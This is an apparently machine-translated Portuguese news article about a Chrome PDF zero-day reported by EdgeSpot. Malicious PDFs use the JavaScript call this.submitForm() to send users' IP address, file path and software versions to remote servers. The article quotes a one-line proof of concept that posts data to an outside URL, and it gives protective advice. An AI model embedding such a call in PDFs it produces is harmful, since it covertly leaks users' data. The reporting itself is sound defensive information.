1. Lar
  2. Notícia
  3. Vulnerabilidade do Chrome permite que hackers coletem dados do usuário por meio de arquivos PDF

Vulnerabilidade do Chrome permite que hackers coletem dados do usuário por meio de arquivos PDF

Índice:

Vídeo: [FIXED] PDF Files Open In Chrome Instead of Adobe Reader 2024

Vídeo: [FIXED] PDF Files Open In Chrome Instead of Adobe Reader 2024
Anonim

O serviço de detecção de exploração EdgeSpot descobriu uma intrigante vulnerabilidade de dia zero do Chrome que explora documentos PDF. A vulnerabilidade permite que os invasores colhem dados confidenciais usando documentos PDF maliciosos abertos no Chrome.

Assim que a vítima abre os respectivos arquivos PDF no Google Chrome, um programa malicioso começa a funcionar em segundo plano, coletando dados do usuário.

Os dados são então encaminhados para o servidor remoto que está sendo controlado pelos hackers. Você pode estar se perguntando quais dados estão sendo sugados pelos atacantes, eles direcionam os seguintes dados no seu PC:

  • endereço de IP
  • Caminho completo do arquivo PDF no sistema
  • Versões de SO e Chrome

Cuidado com arquivos PDF repletos de malware

Você pode se surpreender ao saber que nada acontece quando o Adobe Reader é usado para abrir arquivos PDF. Além disso, as solicitações HTTP POST são usadas para transferir dados para os servidores remotos sem nenhuma intervenção do usuário.

Especialistas descobriram que um dos dois domínios readnotifycom ou burpcollaboratornet estava recebendo os dados.

Você pode imaginar a intensidade do ataque considerando o fato de que a maioria do software antivírus não é capaz de detectar as amostras detectadas pelo EdgeSpot.

Especialistas revelam que os invasores estão usando a API Javascript PDF "this.submitForm ()" para coletar as informações confidenciais dos usuários.

Nós o testamos com um PoC mínimo, uma simples chamada de API como "this.submitForm ('http://google.com/test')" fará com que o Google Chrome envie os dados pessoais para o google.com.

Os especialistas descobriram que esse bug do Chrome estava sendo explorado por dois conjuntos distintos de arquivos PDF maliciosos. Ambos foram divulgados em outubro de 2017 e setembro de 2018, respectivamente.

Notavelmente, os dados coletados podem ser usados ​​pelos atacantes para ajustar os ataques no futuro. Os relatórios sugerem que o primeiro lote de arquivos foi compilado usando o serviço de rastreamento de PDF do ReadNotify.

Os usuários podem utilizar o serviço para acompanhar as visualizações do usuário. O EdgeSpot não compartilhou detalhes sobre a natureza do segundo conjunto de arquivos PDF.

Como permanecer protegido

O serviço de detecção de exploração EdgeSpot queria alertar os usuários do Chrome sobre os riscos potenciais, porque não é esperado que o patch seja lançado em um futuro próximo.

O EdgeSpot informou ao Google sobre a vulnerabilidade no ano passado e a empresa prometeu lançar um patch no final de abril. H

No entanto, você pode considerar usar uma solução temporária para o problema visualizando localmente os documentos PDF recebidos usando um aplicativo leitor de PDF alternativo.

Como alternativa, você também pode abrir seus documentos PDF no Chrome desconectando seus sistemas da Internet. Enquanto isso, você pode esperar a atualização do Chrome 74, que deve ser lançada em 23 de abril.

Microsoft permite que os usuários denunciem discursos de ódio por meio de formulários da web dedicados

Microsoft permite que os usuários denunciem discursos de ódio por meio de formulários da web dedicados

A Microsoft anunciou que lançou um novo formulário da web dedicado com o qual os usuários podem denunciar o discurso de ódio. Além disso, há também um formulário da Web separado para solicitações de reconsideração e reposição do conteúdo. Isso foi confirmado por Jacqueline Beaucher, diretora de segurança on-line da Microsoft. Beauchere mencionou isso em sua postagem no blog: a Microsoft está comprometida em…

Microsoft processa federais por busca secreta de dados de clientes, espera encontrar meio termo

Microsoft processa federais por busca secreta de dados de clientes, espera encontrar meio termo

Ultimamente, temos relatado fortemente sobre a recente onda de processos contra a Microsoft durante a atualização forçada do Windows 10. Resumindo: a Microsoft perdeu um processo de atualização do Windows 10 e teve que pagar US $ 10.000 em danos, e parece que este julgamento encorajou o Procurador Geral de Nova York a abrir um novo caso sobre o assunto depois de receber uma série de usuários…

Vulnerabilidade do Outlook permite que hackers roubem hashes de senha

Vulnerabilidade do Outlook permite que hackers roubem hashes de senha

O Microsoft Outlook é uma das plataformas de email mais populares do mundo. Pessoalmente, confio no meu endereço de e-mail do Outlook para tarefas pessoais e relacionadas ao trabalho. Infelizmente, o Outlook pode não ser tão seguro quanto os usuários gostariam de pensar. De acordo com um relatório publicado pelo Instituto de Engenharia de Software Carnegie Mellon, Outlook…

Vulnerabilidade do Chrome permite que hackers coletem dados do usuário por meio de arquivos PDF

Escolha dos editores

Maçã
iStumbler – Pesquise redes Wi-Fi facilmente no Mac

iStumbler – Pesquise redes Wi-Fi facilmente no Mac

2024
Maçã
Cinco aplicativos natalinos para Mac OS X que espalharão alegria por toda a sua área de trabalho

Cinco aplicativos natalinos para Mac OS X que espalharão alegria por toda a sua área de trabalho

2024
Maçã
Dez utilitários de linha de comando do OS X que você talvez não conheça

Dez utilitários de linha de comando do OS X que você talvez não conheça

2024
Maçã
CoconutBattery – Obtenha informações estendidas sobre a bateria de laptops Mac

CoconutBattery – Obtenha informações estendidas sobre a bateria de laptops Mac

2024
Maçã
Como iniciar o aplicativo na inicialização do sistema no Mac OS X

Como iniciar o aplicativo na inicialização do sistema no Mac OS X

2024
Maçã
Como ajustar manualmente a luz de fundo do teclado do MacBook Pro

Como ajustar manualmente a luz de fundo do teclado do MacBook Pro

2024